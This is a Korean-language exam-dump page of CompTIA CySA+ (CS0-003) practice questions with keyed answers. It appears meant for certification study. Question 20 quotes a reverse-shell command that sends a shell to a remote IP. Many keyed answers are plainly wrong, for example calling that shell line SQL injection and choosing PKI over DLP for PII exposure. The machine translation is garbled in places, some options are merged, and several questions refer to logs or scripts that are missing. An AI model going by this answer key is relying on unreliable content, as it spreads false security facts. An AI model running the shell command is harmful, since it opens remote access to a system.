CompTIA CS0-003 인증 시험 문제 및 답변, CompTIA 사이버 보안 분석가 (CySA +) | SPOTO
종합적인 연습 문제 모음을 통해 CompTIA CS0-003 인증 시험에 대비하세요. 우리의 플랫폼은 무료 시험, 샘플 문제, 모의고사 등 다양한 시험 자료를 제공합니다. 해당 분야의 전문가가 선별한 시험 문제와 답변을 통해 시험 준비를 강화할 수 있습니다. 온라인 시험 시뮬레이터를 활용하여 실제 시험 시나리오를 시뮬레이션하고 준비 상태를 측정하세요. 시험 덤프를 통해 시험 구조와 내용에 대한 귀중한 통찰력을 얻어 시험 당일에 자신감을 가질 수 있습니다. 지식을 강화하거나 시험 패턴에 익숙해지려는 경우, 저희의 모의고사는 CompTIA Cybersecurity Analyst (CySA+) 자격증 시험에 합격할 수 있는 이상적인 리소스를 제공합니다.
다음 중 데이터 심각성 문제로 인해 가장 큰 영향을 받을 수 있는 조직의 이니셔티브는 무엇입니까?
A. 클라우드 기반 환경으로 이동하기
B. 로컬 호스팅 가상 서버로 마이그레이션하기
C. 부인 방지 제어 구현하기
D. 로컬 데이터베이스 쿼리 암호화
답변 보기
정답:
C
질문 #2
최근 팀에 합류한 보안 분석가가 프로덕션 스크립트에서 어떤 스크립팅 언어가 사용되는지 파악하여 악성 스크립트인지 확인하려고 합니다. 다음 스크립트가 주어졌습니다: 다음 중 스크립트에 사용된 스크립팅 언어는 무엇인가요?
A. 파워쉘
B. 루비
C. Python
D. 셸 스크립트
답변 보기
정답:
A
질문 #3
보안 분석가가 기본 호스트에서 자격 증명을 추출하는 데 악용될 수 있는 LFI 취약점을 발견했습니다. 다음 중 보안 분석가가 웹 서버 로그에서 특정 취약점이 악용된 증거를 검색하는 데 사용할 수 있는 패턴은 무엇인가요?
A. /등/ 그림자
B. 로컬호스트 컬
C. ; printenv
D. cat /proc/self/
답변 보기
정답:
A
질문 #4
다음 중 특정 서버에서 패치 정보를 수집하는 가장 좋은 방법은 무엇인가요?
A. 이벤트 뷰어
B. 사용자 지정 스크립트
C. SCAP 소프트웨어
D. CI/CD
답변 보기
정답:
D
질문 #5
최고 정보 보안 책임자는 제로 트러스트 접근 방식의 일환으로 공격 표면 위험과 위협을 줄이기 위한 새로운 프로그램을 지휘하고 있습니다. IT 보안 팀은 이 프로그램의 우선순위를 정해야 합니다. 다음 중 일반적인 공격 프레임워크를 기준으로 가장 우선순위가 높은 것은 무엇인가요?
A. 관리자 및 권한 있는 액세스 계정 줄이기
B. 네트워크 기반 IDS 사용
C. 철저한 사고 대응 수행
D. 엔터프라이즈 애플리케이션에 SSO 사용
답변 보기
정답:
C
질문 #6
조직에는 다음과 같은 위험 완화 정책이 있습니다: 확률이 95% 이상인 위험은 영향에 관계없이 다른 모든 위험보다 먼저 해결됩니다. 다른 모든 우선순위는 위험 값에 따라 결정됩니다. 조직에서 다음과 같은 리스크를 확인했습니다: 다음 중 위험 완화를 위한 우선순위가 가장 높은 것부터 가장 낮은 것까지의 순서는 무엇인가요?
A. A, B, D, C
B. A, B, C, D
C. D, A, B, C
D. D, A, C, B
답변 보기
정답:
C
질문 #7
다음 CVSS 문자열이 주어졌을 때 다음 중 이 취약점을 올바르게 설명하는 속성은 무엇입니까?
A. 이 취약점을 익스플로잇하려면 사용자가 필요합니다
B. 취약점은 네트워크 기반입니다
C. 이 취약점은 기밀성에 영향을 미치지 않습니다
D. 취약점을 악용하기 위한 복잡성이 높습니다
답변 보기
정답:
B
질문 #8
한 보안 분석가가 웹 서버 로그를 검토하던 중 다음 줄을 발견했습니다: 다음 중 어떤 악성 활동이 시도되었나요?
A. 명령 주입
B. XML 주입
C. 서버 측 요청 위조
D. 교차 사이트 스크립팅
답변 보기
정답:
D
질문 #9
웹 서버 로그를 검토하던 중 분석가가 타임스탬프가 동일한 여러 항목이 있지만 모두 요청 줄에 홀수 문자가 포함되어 있는 것을 발견합니다. 다음 중 어떤 단계를 수행해야 하나요?
A. 즉시 네트워크를 종료하고 다음 지휘계통의 사람에게 연락하세요
B. 홀수 문자가 어떤 공격을 나타내는지 확인합니다
C. 올바른 공격 프레임워크를 활용하고 사고 대응을 어떻게 구성할지 결정합니다
D. 사고 대응을 위해 현지 법 집행 기관에 알리기
답변 보기
정답:
D
질문 #10
다음 중 재해 복구 계획을 수립할 때 가장 먼저 수행해야 하는 단계는 무엇인가요?
A. 계획의 목표와 목적에 동의합니다
B. 재해 발생 시 사용할 사이트 결정C 표준 재해 복구 프로세스를 준수함을 입증합니다
C. 재난 시 실행할 신원 확인 애플리케이션
답변 보기
정답:
A
질문 #11
다음 중 SIEM, SOAR 및 티켓팅 시스템에 대한 최근의 투자를 고려할 때 조직이 집중해야 할 가장 좋은 메트릭은 무엇인가요?
A. 평균 탐지 시간
B. 전술별 익스플로잇 건수
C. 경고 볼륨
D. 침입 시도 횟수
답변 보기
정답:
A
질문 #12
직원이 웹사이트에 접속하여 디바이스가 침입형 멀웨어에 감염되었습니다. 사고 대응 분석가가 초기 증거 로그를 작성했습니다. 디바이스의 무선 어댑터를 비활성화했습니다. 접속한 웹사이트를 식별할 수 없는 직원을 면담했습니다. 웹 프록시 트래픽 로그를 검토했습니다. 다음 중 분석가가 감염된 디바이스를 치료하기 위해 수행해야 하는 작업은 무엇인가요?
A. 시스템 펌웨어를 업데이트하고 하드웨어를 다시 이미지화합니다
B. 분석가에게 이메일 알림을 전송하는 추가 멀웨어 스캐너를 설치합니다
C. 인터넷 액세스를 위해 프록시 서버를 사용하도록 시스템을 구성합니다
D. 사용자 프로필을 삭제하고 백업에서 데이터를 복원합니다
답변 보기
정답:
A
질문 #13
한 제조 회사가 티어 1 보안 지원을 위해 타사 서비스 제공업체를 이용합니다. 요구 사항 중 하나는 공급업체가 지정학적 및 국가 안보상의 이해관계로 인해 자국에서만 인재를 조달해야 한다는 것입니다. 다음 중 제조 회사가 타사 서비스 제공업체가 이 요구 사항을 충족하도록 하기 위해 구현할 수 있는 것은 무엇인가요?
A. 거버넌스를 통해 안전한 공급망 프로그램을 구현합니다
B. 카운티 외부의 IP 주소에 대한 블랙리스트를 구현합니다
C. 계약업체에 대한 강력한 인증 제어를 구현합니다
D. 주요 직원에 대한 사용자 행동 분석을 구현합니다
답변 보기
정답:
A
질문 #14
IT 보안 분석가가 최근에 구매한 새 차량의 취약성에 관한 이메일 경고를 받았습니다. 다음 중 이 취약점이 표적으로 삼을 가능성이 가장 높은 공격 벡터는 무엇인가요?
A. SCADA
B. CAN 버스
C. 모드버스
D. loT
답변 보기
정답:
A
질문 #15
다음 중 분석가가 SIEM 알림의 IP 주소가 알려진 악성 IP 주소인지 여부를 신속하게 파악하는 데 도움이 되는 것은 무엇인가요?
A. 회사의 산업별 정보 공유 및 분석 센터에 가입하세요
B. 위협 인텔리전스를 STIX/TAXII 형식으로 IPS에 업로드합니다
C. 수집 파이프라인에서 IPS에 대한 데이터 보강을 추가합니다
D. SIEM 알림을 확인한 후 위협 피드를 검토합니다
답변 보기
정답:
A
질문 #16
한 보안 분석가가 동일한 회사 및 지역에 속한 여러 소스 네트워크에서 가능한 네트워크 주소를 식별하려고 합니다. 다음 중 이 목표를 달성하는 데 도움이 될 수 있는 셸 스크립트 함수는 무엇인가요?
A. 함수 w() { a=$(ping -c 1 $1 | awk-F "/" 'END{print $1}') && echo "$1 | $a" }
B. 함수 x() { b=traceroute -m 40 $1 | awk 'END{print $1}') && echo "$1 | $b" }
C. 함수 y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F "
D. 함수 z() { c=$(geoiplookup$1) && echo "$1 | $c" }
답변 보기
정답:
A
질문 #17
최근 제로데이 취약점이 활발하게 악용되고 있으며, 사용자 상호 작용이나 권한 상승이 필요하지 않고, 기밀성 및 무결성에는 상당한 영향을 미치지만 가용성에는 영향을 미치지 않는 제로데이 취약점이 있습니다. 다음 중 이 제로데이 위협에 대해 가장 정확한 CVE 메트릭은 무엇인가요?
A. CVSS: 31/AV: N/AC: L/PR: N/UI: N/S: U/C: H/1: K/A: L
B. CVSS:31/AV:K/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:L
C. CVSS:31/AV:N/AC:L/PR:N/UI:H/S:U/C:L/I:N/A:H
D. CVSS:31/AV:L/AC:L/PR:R/UI:R/S:U/C:H/I:L/A:H
답변 보기
정답:
A
질문 #18
전날 밤의 사고 보고서를 검토하던 보안 분석가가 회사 웹사이트가 포엠카이 선전으로 훼손된 것을 발견했습니다. 다음 중 이러한 유형의 행위자를 가장 잘 설명하는 것은 무엇인가요?
A. 핵티비스트
B. 국가
C. 내부자 위협
D. 조직 범죄
답변 보기
정답:
C
질문 #19
분석가가 헤더에 추가 문자가 포함된 HTTPS 트래픽을 다른 국가의 알려진 악성 IP로 전송하는 내부 디바이스가 있음을 발견했습니다. 다음 중 분석가가 발견한 내용을 설명하는 것은 무엇인가요?
A. 비콘
B. 교차 사이트 스크립팅
C. 버퍼 오버플로
D. PHP 트래버스
답변 보기
정답:
D
질문 #20
보안 분석가가 다음 명령이 포함된 익스플로잇 시도를 탐지했습니다: sh -i >& /dev/udp/10.1.1.1/4821 0>$l 다음 중 어느 것이 시도되고 있습니까?
A. RCE
B. 리버스 셸
C. XSS
D. SQL 주입
답변 보기
정답:
D
질문 #21
한 보안 분석가가 회사 임원을 사칭하는 이메일을 완화하기 위해 회사 이메일 시스템의 보안을 개선하는 방법을 연구하고 있습니다. 다음 중 분석가가 이 목표를 달성하기 위해 구성하는 것이 가장 좋은 것은 무엇인가요?
A. SPF용 네임 서버의 TXT 레코드
B. 보안 복제를 위한 DNSSEC 키
C. 도메인 키가 식별된 사람
D. 수신되는 매드 확인을 위한 샌드박스
답변 보기
정답:
B
질문 #22
보안 분석가는 개발 학습에 기업 네트워크에서 3계층 클라우드 환경까지 안전하게 연결할 수 있는 기능을 제공해야 합니다. 개발자는 다양한 구성 작업을 수행하기 위해 세 계층의 서버에 모두 액세스해야 합니다. 다음 중 분석가가 안전한 전송을 제공하기 위해 구현해야 하는 기술은 무엇인가요?
A. CASB
B. VPC
C. 연맹
D. VPN
답변 보기
정답:
C
질문 #23
다음 중 성공적인 정보 보안 프로그램의 핵심 요소를 가장 잘 설명하는 것은 무엇인가요?
A. 비즈니스 영향 분석, 자산 및 변경 관리, 보안 커뮤니케이션 계획
B. 보안 정책 구현, 역할 및 책임 할당, 정보 자산 분류
C. 재해 복구 및 비즈니스 연속성 계획, 액세스 제어 요구 사항 및 인적 자원 정책의 정의
D. 보안 관리 시스템 운영을 위한 고위 관리 조직 구조, 메시지 배포 기준 및 절차
답변 보기
정답:
A
질문 #24
한 보안 분석가가 네트워크 라우팅에서 이상 징후를 식별하려고 합니다. 다음 중 분석가가 목표를 가장 정확하게 달성하기 위해 셸 스크립트에서 사용할 수 있는 함수는 무엇인가요?
A. 함수 x() { info=$(geoiplookup $1) && echo "$1 | $info" }
B. 함수 x() { info=$(ping -c 1 $1 | awk -F "/" 'END{print $5}') && echo "$1 | $info" }
C. 함수 x() { info=$(dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F "
D. 함수 x() { info=$(traceroute -m 40 $1 | awk 'END{print $1}') && echo "$1 | $info" }
답변 보기
정답:
D
질문 #25
한 조직에서 최근 BC 및 DR 계획을 변경했습니다. 다음 중 사고 대응 팀이 비즈니스에 영향을 주지 않으면서 변경 사항을 테스트할 수 있는 가장 좋은 방법은 무엇인가요?
A. 이전에 확인된 사고 시나리오를 기반으로 테이블 탑 훈련을 수행합니다
B. 기본 데이터 센터의 전원을 차단하여 사고를 시뮬레이션합니다
C. 활성 워크로드를 기본 데이터 센터에서 보조 위치로 마이그레이션합니다
D. 현재 계획을 이전 사고에서 얻은 교훈과 비교합니다
답변 보기
정답:
B
질문 #26
한 조직의 영업 담당자인 Joe는 소셜 미디어를 통해 현재 직장을 떠나 현재 고용주와 경쟁할 새로운 회사를 창업한다고 발표했습니다. Joe는 현재 고용주의 고객을 모집하고 있습니다. 하지만 조는 아직 사직서를 제출하거나 현재 상사와 이에 대해 논의하지 않았습니다. 다음 중 사고 대응 팀이 권장할 수 있는 최선의 조치는 무엇인가요?
A. 조의 PC를 네트워크에서 격리합니다
B. 표준 작동 절차에 따라 PC를 다시 이미지화합니다
C. 모바일 장치 관리를 사용하여 Joe의 PC를 원격으로 초기화합니다
D. 인사부 또는 법률 고문이 다음 단계에 대해 조언할 때까지 조치를 취하지 않습니다
답변 보기
정답:
B
질문 #27
다음 중 조직 외부로 PII가 노출되는 것을 방지하는 데 가장 효과적인 도구는 무엇인가요?
A. PAM
B. IDS
C. PKI
D. DLP
답변 보기
정답:
C
질문 #28
최고 정보 보안 책임자는 기업에서 섀도 IT를 제거하고 줄이기를 원합니다. 조직에 위험을 증가시키는 여러 고위험 클라우드 애플리케이션이 사용되고 있습니다. 다음 중 위험을 줄이는 데 도움이 되는 솔루션은 무엇인가요?
A. CASB 배포 및 정책 적용 활성화
B. 엄격한 액세스 권한으로 MFA 구성
C. API 게이트웨이 배포
D. 클라우드 애플리케이션에 SSO 사용
답변 보기
정답:
A
질문 #29
회사의 최고 정보 책임자는 클라우드 액세스 중 정책이 준수되고 있는지 확인하기 위해 CASB 솔루션을 사용하고자 합니다. 회사 비즈니스의 특성과 위험 성향으로 인해 경영진은 재무 정보를 클라우드에 저장하지 않기로 결정했습니다. 보안 분석가는 클라우드로의 재무 데이터 유출 위협을 완화할 수 있는 솔루션을 추천해야 합니다. 분석가는 다음 중 어떤 솔루션을 추천해야 하나요?
A. CASB를 활용하여 온프레미스에 저장된 금융 정보에 대해 DLP 미사용 데이터 보호를 시행하세요
B. 이러한 목적으로 CASB 솔루션을 활용하지 말고 이동 중인 데이터에 대해 온프레미스 DLP를 추가하세요
C. CASB를 활용하여 클라우드로 이동하는 금융 정보에 대해 이동 중인 DLP 데이터 보호를 시행합니다
D. 이 용도로 CASB 솔루션을 사용하지 말고 미사용 데이터에 대해 온프레미스 DLP를 추가하세요
답변 보기
정답:
C
질문 #30
보안 분석가가 패킷 캡처의 활동 유형을 분석하기 위해 tcpdump의 출력을 검토하고 있습니다: 다음 중 위의 출력을 생성한 것은 무엇인가요?
A. 포트 스캔
B. TLS 연결
C. 취약성 검사
D. 핑 스윕
답변 보기
정답:
D
질문 #31
보안 분석가가 패킷 캡처를 분석하는 동안 다음과 같은 의심스러운 DNS 트래픽을 발견했습니다 터널링 세션이 활성화되어 있는 동안의 DNS 트래픽. ? 쿼리 사이의 평균 시간이 1초 미만인 경우. ? 평균 쿼리 길이가 100자를 초과합니다. 다음 중 가장 가능성이 높은 공격은 무엇인가요?
A. DNS 유출
B. DNS 스푸핑
C. DNS 영역 이전
D. DNS 중독
답변 보기
정답:
D
질문 #32
사이버 보안 분석가가 회사가 거래하지 않는 국가에서 비정상적인 네트워크 스캔 활동을 발견했습니다. 다음 중 가장 좋은 방어 기법은 무엇인가요?
A. 위반 소스 국가 지역 차단
B. 네트워크 방화벽에서 스캔의 IP 범위를 차단합니다
C. 과거 트렌드 분석을 수행하여 유사한 스캔 활동을 찾습니다
D. 네트워크 방화벽에서 스캔의 특정 IP 주소를 차단합니다
답변 보기
정답:
A
질문 #33
가설을 세우고, 침해 지표를 찾고, 그 결과를 사용하여 탐지 기능을 선제적으로 개선하는 것이 그 가치를 보여주는 예입니다:
A. 취약점 스캔
B. 위협 추적
C. 빨간색 학습
침투 테스트.
답변 보기
정답:
B
질문 #34
새로운 사이버 보안 분석가가 조직에 대한 가능한 위협에 대한 경영진 브리핑을 작성하는 임무를 맡았습니다. 다음 중 브리핑에 필요한 데이터를 생성하는 것은 무엇인가요?
A. 방화벽 로그
B. 타협 지표
C. 위험 평가
D. 액세스 제어 목록
답변 보기
정답:
B
제출 후 답변 보기
질문에 대한 답변을 얻으려면 이메일과 WhatsApp을 제출하세요.
참고: 올바른 시험 결과를 얻을 수 있도록 이메일 ID와 Whatsapp이 유효한지 확인하십시오.